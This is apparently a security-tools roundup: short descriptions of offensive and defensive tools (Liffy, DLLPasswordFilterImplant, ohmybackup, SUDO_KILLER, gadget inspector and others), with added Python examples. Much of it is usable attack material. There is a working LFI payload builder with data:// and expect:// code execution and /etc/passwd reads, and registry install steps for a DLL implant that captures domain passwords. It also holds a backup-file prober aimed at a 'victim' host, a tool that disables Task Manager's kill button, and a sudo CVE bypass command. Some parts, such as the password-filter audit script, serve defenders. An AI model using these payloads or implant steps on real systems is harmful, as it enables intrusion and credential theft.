Miami, February 19, 2020 – Faraday is opening 2020 by aligning its releases with the calendar of featured worldwide cybersecurity events, starting next week with BSides and RSAC in San Francisco. As a Black Hat Global Partner, the company will also sponsor all of Black Hat's global events. Through automation technology and workflow intelligence, Faraday Platform helps teams shorten the life cycle of their vulnerability findings by prioritizing actions and reducing the exposure time of their assets while managing their own security ecosystem. Duplicate Vulnerability Detection, Agents with Process Scheduler and the new Cloud implementation are some of the latest enhancements, focused on automating every phase of the Vulnerability Management process and thereby increasing a team's maturity and risk mitigation. "We believe that understanding your security posture is the main key to making smarter security investments." From February 24 to 28, the Faraday team will be available for executive meetings around the BSides and RSA conferences in San Francisco, to talk about Vulnerability Management Automation and how their technology can help you. For those interested in growing their business by adding Faraday to their portfolio, this will also be an opportunity to learn about the new Partner Program, designed to adapt to different strategies and business levels. About Faraday: Faraday's mission is to help companies perform Vulnerability Management by…

dnssearch is a subdomain enumeration tool.

Purpose
dnssearch takes an input domain (-domain parameter) and a wordlist (-wordlist parameter); it then performs concurrent DNS requests, using the lines of the wordlist as subdomain labels, eventually brute-forcing every subdomain that exists under the base domain. It supports a custom file extension (-ext, default php) and other optional arguments:

Usage of ./dnssearch:
  -consumers int    Number of concurrent consumers. (default 8)
  -domain string    Base domain to start enumeration from.
  -wordlist string  Wordlist file to use for enumeration. (default "names.txt")
  -a bool           Lookup A records (default true)
  -txt bool         Lookup TXT records (default false)
  -cname bool       Show CNAME results (default false)

Compilation
  go get github.com/evilsocket/dnssearch
  cd dnssearch
  go build -o dnssearch main.go

Compilation and use with Docker
  docker build -t dnssearch .
  docker run -it --rm dnssearch

License
This project is copyleft of Simone Margaritelli and released under the GPL 3 license.

Download…
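The producer/consumer brute force described above, as an added example in Python (not dnssearch's own Go code): a wordlist is de-duplicated, each label is prefixed to the base domain, and a pool of consumers resolves the candidates. The resolver is injected, so the demo runs offline against a constructed answer table for the non-existent domain example.test; swap in system_resolver for a live run. It also adds the check a practitioner wants before trusting the output: a wildcard probe, so a zone that answers for everything does not produce a wordlist-sized list of false positives.

```python
"""Concurrent subdomain brute force with wildcard filtering (added example)."""
from concurrent.futures import ThreadPoolExecutor
import socket
from typing import Callable, Iterable

# A resolver maps a name to its addresses; [] means NXDOMAIN / no answer.
Resolver = Callable[[str], list]


def system_resolver(name: str) -> list:
    """Real A-record lookup through the OS resolver; failures become []."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(name, None, socket.AF_INET)})
    except socket.gaierror:
        return []


def enumerate_subdomains(domain: str, words: Iterable[str], resolve: Resolver,
                         consumers: int = 8) -> dict:
    """Return {fqdn: [addresses]} for every wordlist entry that resolved."""
    candidates, seen = [], set()
    for w in words:
        w = w.strip().lower().rstrip(".")
        if w and w not in seen:            # skip blank and duplicate wordlist lines
            seen.add(w)
            candidates.append(f"{w}.{domain}")
    found = {}
    with ThreadPoolExecutor(max_workers=consumers) as pool:
        # pool.map keeps input order, so zip pairs each answer with its name
        for fqdn, addrs in zip(candidates, pool.map(resolve, candidates)):
            if addrs:
                found[fqdn] = addrs
    return found


def wildcard_baseline(domain: str, resolve: Resolver,
                      probe: str = "zz-wildcard-probe-4d1a") -> list:
    """Resolve a label that should not exist; a non-empty answer means a
    wildcard record is answering for every label."""
    return resolve(f"{probe}.{domain}")


def filter_wildcard(found: dict, baseline: list) -> dict:
    """Drop hits whose answer set is identical to the wildcard answer."""
    if not baseline:
        return found
    return {name: addrs for name, addrs in found.items() if addrs != baseline}


# Constructed answer table standing in for a live zone (example.test is not real).
FAKE_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.25"],
    "dev.example.test": ["192.0.2.50"],
}


def fake_resolver(name: str) -> list:
    return FAKE_ZONE.get(name, [])


def demo() -> dict:
    words = ["www", "mail", "ftp", "dev", "WWW", "", "vpn"]   # constructed wordlist
    hits = enumerate_subdomains("example.test", words, fake_resolver, consumers=4)
    return filter_wildcard(hits, wildcard_baseline("example.test", fake_resolver))


if __name__ == "__main__":
    for name, addrs in sorted(demo().items()):
        print(name, ", ".join(addrs))
```

Against a real target, compare the size of the wildcard answer set with the hit list: if they match on most names, the domain has a wildcard and only the entries filter_wildcard keeps are worth following up.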

LFI Exploitation tool: a little Python tool to perform Local File Inclusion (LFI) exploitation. Liffy v2.0 is the improved version of liffy, which was originally created by rotlogix/liffy. The latter is no longer available and the former hasn't seen any development for a long time.

Main features
  data:// for code execution
  expect:// for code execution
  input:// for code execution
  filter:// for arbitrary file reads
  /proc/self/environ for code execution in CGI mode
  Apache access.log poisoning
  Linux auth.log SSH poisoning
  Direct payload delivery with no stager
  Support for absolute and relative path traversal
  Support for cookies for authentication

Documentation: Installation, Usage

Contribution
  Suggest a feature (like any other technique to exploit LFI)
  Report a bug
  Fix something and open a pull request
  In any case, feel free to open an issue

Credits
All the exploitation techniques are taken from liffy. The logo for this project is taken from renderforest.

Support
If you'd like, you can buy me some coffee:

Download…
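How three of the wrappers in that feature list are actually used, as an added example (not Liffy's code): php://filter wraps the target in a base64 encoder so PHP source comes back as text instead of being executed, data:// carries the PHP code inside the URL, and expect:// runs a command directly. The target URL http://target.test/index.php, the parameter name page and the traversal depth are assumptions for the demo; the decode step handles the case where the base64 blob comes back wrapped in page whitespace or with its padding truncated.

```python
"""LFI payload construction for php://filter, data:// and expect:// (added example)."""
import base64
from urllib.parse import quote

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="


def traverse(path: str, depth: int = 0) -> str:
    """Absolute paths pass through; relative ones get `depth` levels of ../ prepended."""
    if path.startswith("/"):
        return path
    return "../" * depth + path


def filter_read_payload(path: str, depth: int = 0) -> str:
    """php://filter returns the file base64-encoded, so .php files are read, not executed."""
    return FILTER_PREFIX + traverse(path, depth)


def decode_filter_response(body: str) -> bytes:
    """Decode the blob PHP emits for a php://filter include: drop the whitespace
    the page wraps around it and restore padding lost to truncated output."""
    blob = "".join(body.split())
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob)


def data_wrapper_payload(php_code: str) -> str:
    """data:// carries the code in the URL; PHP only includes it with allow_url_include=On."""
    return "data://text/plain;base64," + base64.b64encode(php_code.encode()).decode()


def expect_wrapper_payload(command: str) -> str:
    """expect:// executes a command; it needs the expect extension, which is rarely installed."""
    return "expect://" + command


def build_url(base: str, param: str, payload: str) -> str:
    """Keep the characters the wrapper syntax needs literal; percent-encode the rest."""
    return f"{base}?{param}={quote(payload, safe='/:;,=+')}"


def demo() -> dict:
    """Assumed target: index.php includes `page` from a directory three levels below /."""
    base, param = "http://target.test/index.php", "page"
    return {
        "read_config": build_url(base, param, filter_read_payload("config.php")),
        "read_passwd": build_url(base, param, filter_read_payload("etc/passwd", depth=3)),
        "data_rce": build_url(base, param, data_wrapper_payload("<?php echo 1; ?>")),
        "expect_rce": build_url(base, param, expect_wrapper_payload("id")),
    }


if __name__ == "__main__":
    for label, url in demo().items():
        print(f"{label:12} {url}")
```

The filter read is the one to try first: it works on a default PHP install, and the decoded source of the including script usually tells you whether a suffix is appended to the parameter (which decides between absolute and relative traversal) and whether allow_url_include is even worth testing.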

DLLPasswordFilterImplant is a custom password filter DLL that captures users' credentials. Every password change on the domain triggers the registered DLL, which exfiltrates the username and the new password value before the change is committed to Active Directory (AD). For more information about password filters, consult Microsoft's documentation.

Installing
To install the password filter on a system:

1. Build the DLL for the target architecture: compile 32-bit for a 32-bit system and 64-bit for a 64-bit system.
2. Copy the DLL to the Windows installation directory (default folder: Windows\System32).
3. Register the password filter by updating the Notification Packages value (REG_MULTI_SZ) under the following registry key:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
   If the Notification Packages value exists, append the name of the DLL ("DLLPasswordFilterImplant" if you didn't rename it) to the existing value data; do not overwrite the existing entries. If the value does not exist, create it and add the name of the DLL ("DLLPasswordFilterImplant" if you didn't rename it) to the value data.
   NOTE: Do not include the .dll extension when adding the name of the DLL to Notification Packages.
4. Configure the public key to use for encrypting the captured credentials. Generate an RSA key and dump its public key, keeping the private key around for decryption:
   KEY=key.pem
   openssl genrsa -out $KEY 2048
5. Prepare the Windows registry key entry:
   echo ‘Windows Registry…
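The registration step above is also the place a defender catches this implant: every name in Notification Packages is a DLL that LSASS loads and hands each new cleartext password to, so the value should only ever contain the packages Windows ships. The following added example (not the project's code) parses the value out of a `reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa lsa.reg` text file, where reg.exe writes REG_MULTI_SZ as `hex(7):` byte lists continued across backslash-terminated lines, and flags anything outside a baseline. The .reg excerpt is constructed; the baseline (scecli on every Windows install, rassfm additionally on domain controllers) is the stock configuration and should be adjusted for legitimate third-party filters in your environment.

```python
"""Audit Lsa\\Notification Packages from a .reg export (added example)."""
import re
from typing import List, Optional, Set

# Stock packages: scecli everywhere, rassfm on domain controllers.
DEFAULT_BASELINE: Set[str] = {"scecli", "rassfm"}

# Constructed export of the Lsa key after the implant was registered:
# the value decodes to scecli, rassfm, DLLPasswordFilterImplant.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,72,00,\
  61,00,73,00,73,00,66,00,6d,00,00,00,44,00,4c,00,4c,00,50,00,61,00,73,00,\
  73,00,77,00,6f,00,72,00,64,00,46,00,69,00,6c,00,74,00,65,00,72,00,49,00,\
  6d,00,70,00,6c,00,61,00,6e,00,74,00,00,00,00,00
"""


def parse_multi_sz_hex7(payload: str) -> List[str]:
    """hex(7) is REG_MULTI_SZ: UTF-16LE strings separated by NUL, double NUL at the end."""
    raw = bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", payload))
    return [s for s in raw.decode("utf-16-le").split("\x00") if s]


def notification_packages_from_reg(reg_text: str) -> Optional[List[str]]:
    """Find the value in a .reg export and join its backslash-continued lines."""
    lines = reg_text.splitlines()
    for i, line in enumerate(lines):
        if not line.startswith('"Notification Packages"=hex(7):'):
            continue
        payload = line.split("hex(7):", 1)[1]
        while payload.rstrip().endswith("\\") and i + 1 < len(lines):
            i += 1
            payload = payload.rstrip()[:-1] + lines[i].strip()
        return parse_multi_sz_hex7(payload)
    return None


def audit_notification_packages(packages: List[str],
                                baseline: Set[str] = DEFAULT_BASELINE) -> List[str]:
    """Entries outside the baseline, compared case-insensitively."""
    allowed = {b.lower() for b in baseline}
    return [p for p in packages if p.lower() not in allowed]


def demo() -> List[str]:
    packages = notification_packages_from_reg(SAMPLE_REG) or []
    return audit_notification_packages(packages)


if __name__ == "__main__":
    for name in demo():
        print(f"unexpected password filter: {name} (check System32\\{name}.dll)")
```

Each flagged name maps to System32\<name>.dll; confirm it is loaded in lsass.exe, check its signature and origin, and remember that removing the entry only takes effect at the next reboot, so any password changed in the meantime is still captured.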

ohmybackup – Scan a victim's backup directories and backup files

ohmybackup scans backup folders on target sites and searches for archived files in the folders it finds. With its two-file scanning system it combines extensions and filenames in different ways, making a hit more likely.

1 – files/extensions.txt – Adds new extensions to try; adding an entry in the form .example retries every candidate with the new extension.
2 – files/files.txt – Filenames to try in the folders found, combined with the extensions you added.
3 – files/folders.txt – Folders to scan recursively. You can add to this list yourself.

Installation
  go run ohmybackup.go --hostname victim.host
or
  go build ohmybackup.go

Run
  ./ohmybackup --hostname victim.host

Download…
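The candidate generation behind those three lists, as an added Python example (not ohmybackup's Go code): folders × filenames × extensions, with names derived from the host itself folded into the filename list, because backup archives are very often named after the site. The list contents, the host victim.test and the response table are constructed; the fetcher is injected so the run is offline. It also handles the failure mode that turns a scan like this into noise, a server that answers every missing path with a 200 "soft 404" page, by measuring a known-missing path first and discarding responses of that size.

```python
"""Backup-file candidate generation and probing with soft-404 filtering (added example)."""
from itertools import product
from typing import Callable, Dict, Iterable, List, Tuple
from urllib.parse import urljoin

Fetcher = Callable[[str], Tuple[int, int]]   # url -> (HTTP status, body length)

# Constructed stand-ins for files/folders.txt, files/files.txt and files/extensions.txt
FOLDERS = ["", "backup/", "backups/", "old/"]
FILES = ["backup", "site", "www", "db"]
EXTENSIONS = [".zip", ".tar.gz", ".sql", ".bak"]


def filename_variants(hostname: str, files: Iterable[str]) -> List[str]:
    """Filenames plus host-derived names: victim.host -> victim, victim.host, victim_host."""
    host = hostname.lower()
    label = host.split(".")[0]
    names = list(files) + [label, host, host.replace(".", "_")]
    return list(dict.fromkeys(names))          # de-duplicate, keep order


def candidates(hostname: str, folders=FOLDERS, files=FILES,
               extensions=EXTENSIONS) -> List[str]:
    """Every folder/name/extension combination as an absolute URL."""
    base = f"http://{hostname}/"
    return [urljoin(base, folder + name + ext)
            for folder, name, ext in product(folders, filename_variants(hostname, files), extensions)]


def probe(hostname: str, urls: Iterable[str], fetch: Fetcher) -> Dict[str, int]:
    """Keep 200 responses with a body, minus those matching the soft-404 size."""
    base = f"http://{hostname}/"
    _, soft404_size = fetch(urljoin(base, "this-path-should-not-exist-7f3a.zip"))
    hits = {}
    for url in urls:
        status, size = fetch(url)
        if status == 200 and size > 0 and size != soft404_size:
            hits[url] = size
    return hits


# Constructed server: two real archives, and a 1234-byte "not found" page served with 200.
FAKE_SITE = {
    "http://victim.test/backup/site.zip": (200, 5_000_000),
    "http://victim.test/old/victim_test.sql": (200, 300),
}


def fake_fetch(url: str) -> Tuple[int, int]:
    return FAKE_SITE.get(url, (200, 1234))


def demo() -> Dict[str, int]:
    return probe("victim.test", candidates("victim.test"), fake_fetch)


if __name__ == "__main__":
    for url, size in demo().items():
        print(f"{size:>10}  {url}")
```

For a live target the fetcher would issue HEAD or ranged GET requests and the candidate list would be drawn from the tool's three files; the soft-404 comparison is what keeps a site with a catch-all index page from reporting every combination as a find.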

This project inspects Java libraries and classpaths for gadget chains. Gadget chains are used to construct exploits for deserialization vulnerabilities. By automatically discovering possible gadget chains in an application's classpath, penetration testers can quickly construct exploits and application security engineers can assess the impact of a deserialization vulnerability and prioritize its remediation. This project was presented at Black Hat USA 2018. Learn more about it there! (Links pending)

DISCLAIMER: This project is alpha at best. It needs tests and documentation added. Feel free to help by adding either!

Building
Assuming you have a JDK installed on your system, you should be able to just run ./gradlew shadowJar. You can then run the application with java -jar build/libs/gadget-inspector-all.jar <args>.

How to Use
This application expects as argument(s) either a path to a war file (in which case the war will be exploded and all of its classes and libraries used as a classpath) or else any number of jars. Note that the analysis can be memory intensive (gadget inspector has not yet been optimized to use less memory). For small libraries you probably want to allocate at least 2GB of heap (i.e. with the -Xmx2G flag). For larger applications you will want to use as much memory as you can spare. The toolkit goes through several stages of classpath inspection to build up datasets for use in later stages. These…
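What the search at the end of that pipeline amounts to, reduced to its shape as an added example (not the project's code, and not its algorithm, which additionally tracks which arguments are attacker-controlled through each call): a call graph extracted from the classpath, a set of methods the JVM invokes during deserialization (sources), a set of dangerous methods (sinks), and a breadth-first search for the shortest source-to-sink path. The graph below is constructed by hand; its node names follow the well-known commons-collections chain (HashMap.readObject through InvokerTransformer to Method.invoke) but the edges are illustrative, not extracted from real bytecode.

```python
"""Shortest gadget chain over a constructed call graph (added example)."""
from collections import deque
from typing import Dict, List, Optional, Set

CallGraph = Dict[str, Set[str]]   # caller -> set of callees, as "Class.method"

# Constructed graph; edges are illustrative, not taken from real bytecode.
GRAPH: CallGraph = {
    "HashMap.readObject": {"HashMap.hash"},
    "HashMap.hash": {"TiedMapEntry.hashCode"},
    "TiedMapEntry.hashCode": {"TiedMapEntry.getValue"},
    "TiedMapEntry.getValue": {"LazyMap.get"},
    "LazyMap.get": {"ChainedTransformer.transform"},
    "ChainedTransformer.transform": {"InvokerTransformer.transform"},
    "InvokerTransformer.transform": {"Method.invoke"},
    "Logger.readObject": {"Logger.flush"},     # a harmless readObject, for contrast
    "Logger.flush": set(),
}
SOURCES: Set[str] = {"HashMap.readObject", "Logger.readObject"}   # run during deserialization
SINKS: Set[str] = {"Method.invoke", "Runtime.exec"}               # attacker wants to reach these


def find_chain(graph: CallGraph, sources: Set[str], sinks: Set[str],
               max_depth: int = 10) -> Optional[List[str]]:
    """BFS from all sources at once; returns the shortest source->sink chain, or None."""
    parents: Dict[str, Optional[str]] = {}
    queue = deque()
    for s in sorted(sources):                 # sorted for deterministic results
        parents[s] = None
        queue.append((s, 0))
    while queue:
        node, depth = queue.popleft()
        if node in sinks:
            chain = []
            while node is not None:           # walk parent links back to the source
                chain.append(node)
                node = parents[node]
            return chain[::-1]
        if depth >= max_depth:
            continue
        for callee in sorted(graph.get(node, ())):
            if callee not in parents:         # first visit is the shortest path in BFS
                parents[callee] = node
                queue.append((callee, depth + 1))
    return None


def unreachable_sources(graph: CallGraph, sources: Set[str], sinks: Set[str],
                        max_depth: int = 10) -> Set[str]:
    """Sources from which no sink is reachable; these need no further attention."""
    return {s for s in sources if find_chain(graph, {s}, sinks, max_depth) is None}


if __name__ == "__main__":
    chain = find_chain(GRAPH, SOURCES, SINKS)
    print(" -> ".join(chain) if chain else "no chain")
    print("dead ends:", unreachable_sources(GRAPH, SOURCES, SINKS))
```

The depth bound matters in practice: on a real classpath the graph has hundreds of thousands of edges, and an unbounded search both explains the memory note above and produces chains too long to be useful.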

D4N155 is an information security audit tool that creates intelligent wordlists based on the content of the target page. Help us. See some calculations used.

Install
Needs: Python 3.6, Bash (GNU Bourne-Again SHell). Optional: Git, Groff.

  git clone https://github.com/owasp/D4N155.git
  cd D4N155
  pip3 install -r requirements.txt
  bash main

Or without git:

  wget -qO- https://github.com/owasp/D4N155/archive/master.zip | bsdtar -xf-
  cd D4N155-master
  pip3 install -r requirements.txt
  bash main

Manual
D4N155: Tool for smart security audit
Usage: bash main <option> <value>
All options are optional.

Options:
  -w, --wordlist <url|ip>   Build the smart wordlist from the information found on the website.
  -t, --targets <file>      Build the smart wordlist from the URLs listed in the given file.
  -b, --based <file>        Analyze texts to generate the custom wordlist.
  -r, --rate <time>         Time interval between requests.
  -o, --output <file>       File in which to store the whole wordlist.
  -a, --aggressive          Aggressive reading with a headless browser.
  -h, --help                Show this message.

Values: <url | ip | source | file | time>
  URL   Target URL, for example scanme.nmap.org
  IP    IP address
  TIME  Interval, for example 2.5 (i.e. 00:00:02:30); 0 is the default
  FILE  File to save the result to, to read URLs from, or to use as the wordlist

Download…
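What "a wordlist based on the content of the target page" means in practice, as an added example (not D4N155's code and not its scoring, which the page does not detail): pull the visible text plus title, alt and meta content attributes out of the HTML, skip script and style bodies, rank the remaining words by frequency, and derive the usual password-style candidates from the top terms (capitalisation, year and symbol suffixes, simple leetspeak). The HTML, the year list and the stopword list are constructed for the demo; the -b/--based mode of the tool corresponds to feeding plain text into the same ranking.

```python
"""Content-derived wordlist: extract, rank, mutate (added example)."""
import re
from collections import Counter
from html.parser import HTMLParser
from typing import List


class _TextExtractor(HTMLParser):
    """Collect text nodes and the attribute values that carry names (alt, title, content)."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.parts: List[str] = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip += 1
        for key, value in attrs:
            if key in ("alt", "title", "content") and value:
                self.parts.append(value)

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


STOPWORDS = {"with", "from", "this", "that", "your", "have", "about", "more",
             "http", "https", "www"}                       # constructed, illustrative
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def extract_words(html: str, min_len: int = 4) -> Counter:
    """Lower-cased word frequencies from the page's visible text and name-bearing attributes."""
    parser = _TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z][A-Za-z0-9]{%d,}" % (min_len - 1), " ".join(parser.parts))
    return Counter(w.lower() for w in words)


def mutate(word: str, years=("2019", "2020"), suffixes=("!", "123")) -> List[str]:
    """Case, leet and suffix variants of one term (12 candidates per word)."""
    base = [word, word.capitalize(), word.upper(), word.translate(LEET)]
    out = list(base)
    for b in base[:2]:
        out += [b + y for y in years] + [b + s for s in suffixes]
    return out


def smart_wordlist(html: str, top: int = 20) -> List[str]:
    """Top terms by frequency (minus stopwords), expanded and de-duplicated in rank order."""
    ranked = [w for w, _ in extract_words(html).most_common() if w not in STOPWORDS][:top]
    out: List[str] = []
    for w in ranked:
        out.extend(mutate(w))
    return list(dict.fromkeys(out))


# Constructed target page: the company name dominates, script content must be ignored.
SAMPLE_HTML = """<html><head><title>Acme Rocket Supply</title>
<meta name="keywords" content="acme, rockets, propulsion"></head>
<body><h1>Welcome to Acme</h1>
<p>Acme Rocket Supply builds rockets for everyone. Contact the Acme team about rockets.</p>
<script>var acme = "ignored"; </script>
<img alt="Acme warehouse">
</body></html>"""


if __name__ == "__main__":
    for candidate in smart_wordlist(SAMPLE_HTML, top=3):
        print(candidate)
```

Ranking by raw frequency is the simplest useful signal; a production tool would also weight where a word appears (title and headings over body) and add site-specific tokens such as years from copyright lines, which is the kind of "calculation" the tool's documentation refers to.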

Simple way to disable or rename buttons in a task manager.

Installation
  git clone https://github.com/Mrakovic-ORG/TaskManager-Button-Disabler
  cd "TaskManager-Button-Disabler\TaskManager Button Disabler"
  dotnet build

Features
  Rename the kill process button
  Disable the kill process button
  Works in TaskMgr, Process Hacker, etc.

Download…

Linux privilege escalation through SUDO abuse. If you like the tool, and for my personal motivation to develop other tools, please give it a +1 star. The tool can be used by pentesters, system admins, CTF players, students, system auditors and trolls :).

INTRO
WARNING: SUDO_KILLER is part of the KILLER project. SUDO_KILLER is still under development and there might be some issues; please create an issue if you find any. Other tools will be added to the KILLER project in the coming months, so stay tuned. Ideas, bug reports and contributions are more than welcome! Stay tuned: follow me on Twitter at https://twitter.com/TH3xACE

Overview
SUDO_KILLER is a tool that can be used for privilege escalation on Linux by abusing sudo in several ways. The tool helps to identify misconfigurations within sudo rules, vulnerabilities in the version of sudo in use (CVEs) and the use of dangerous binaries, all of which could be abused to elevate privileges to root. SUDO_KILLER then provides a list of commands or local exploits that could be used to elevate privileges. It is worth noting that the tool does not perform any exploitation on your behalf; the exploitation needs to be performed manually, and this is intended.

Features
Some of the checks/functionalities performed by the tool:
  Misconfigurations
  Dangerous binaries
  Vulnerable versions of sudo – CVEs
  Dangerous environment…
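The three checks named in the overview (rule misconfigurations, dangerous binaries, vulnerable sudo versions), applied to the output of `sudo -l` as an added example (not SUDO_KILLER's bash code): parse the Defaults and rule lines, then flag NOPASSWD rules, binaries that can spawn a shell or write files when run as another user, wildcards in argument lists, env_keep of LD_PRELOAD, and the `(ALL, !root)` runas pattern on sudo older than 1.8.28 (CVE-2019-14287, bypassed with `sudo -u#-1`). The sample output and the sudo version are constructed, and SHELL_CAPABLE is a short illustrative subset of the usual GTFOBins-style list, not the tool's own database. Like the tool, it reports what to look at and does not exploit anything.

```python
"""Triage of `sudo -l` output for abusable rules (added example)."""
import re
from typing import Dict, List

# Illustrative subset: binaries that hand out a shell or file write when run via sudo.
SHELL_CAPABLE = {"vim", "vi", "nano", "less", "more", "find", "awk", "perl", "python",
                 "python3", "bash", "sh", "env", "tar", "zip", "man"}

# "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

# Constructed output of `sudo -l` for user alice.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on host:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL, !root) /bin/bash
    (root) NOPASSWD: /usr/bin/tar -czf /backup/*.tar.gz /var/www/*
"""


def parse_sudo_l(output: str) -> Dict[str, object]:
    """Split `sudo -l` into Defaults entries and rule dicts (runas, tags, cmd)."""
    defaults, rules, in_rules = [], [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            if line.startswith("    "):                  # indented Defaults continuation
                defaults += [d.strip() for d in line.split(",")]
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group("runas").strip(),
                          "tags": re.findall(r"(\w+):", m.group("tags")),
                          "cmd": m.group("cmd").strip()})
    return {"defaults": defaults, "rules": rules}


def version_lt(version: str, reference: str) -> bool:
    """Numeric compare of dotted versions; '1.8.27p1' < '1.8.28' is True, '' is never less."""
    key = lambda s: tuple(int(x) for x in re.findall(r"\d+", s))
    return bool(version) and key(version) < key(reference)


def triage(parsed: Dict[str, object], sudo_version: str = "") -> List[str]:
    """One finding per abusable property; empty list means nothing obvious."""
    findings = []
    if any(d.startswith("env_keep") and "LD_PRELOAD" in d for d in parsed["defaults"]):
        findings.append("env_keep preserves LD_PRELOAD: a shared object can be injected into any sudo-run command")
    for r in parsed["rules"]:
        cmd, runas = r["cmd"], r["runas"]
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        where = f"{cmd} (runas {runas})"
        if cmd == "ALL":
            findings.append(f"unrestricted rule: {where}")
            continue
        if "NOPASSWD" in r["tags"]:
            findings.append(f"NOPASSWD, no authentication needed: {where}")
        if binary in SHELL_CAPABLE:
            findings.append(f"{binary} can spawn a shell or write files as {runas}: {where}")
        if "*" in cmd:
            findings.append(f"wildcard in arguments, check argument injection: {where}")
        if re.fullmatch(r"ALL\s*,\s*!root", runas) and version_lt(sudo_version, "1.8.28"):
            findings.append(f"(ALL, !root) on sudo {sudo_version}: CVE-2019-14287, try sudo -u#-1: {where}")
    return findings


if __name__ == "__main__":
    for f in triage(parse_sudo_l(SAMPLE_SUDO_L), sudo_version="1.8.27"):
        print("-", f)
```

The version string comes from `sudo -V` on the host; the comparison is numeric so patch-level suffixes such as 1.8.27p1 sort correctly. Each finding names the rule it came from, which is what you need when deciding which one to try by hand.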

Adama: Searches for Threat Hunting and Security Analytics. A collection of known log and/or event data searches for threat hunting and detection. They enumerate sets of searches used across many different data pipelines; implementation details are for ELK. Adama is part of the SpaceCake project, a set of hunts, searches, alerts, visualizations and data pipelines for intrusion detection, security analytics and threat hunting using F/OSS (free and open source) tools. Download…
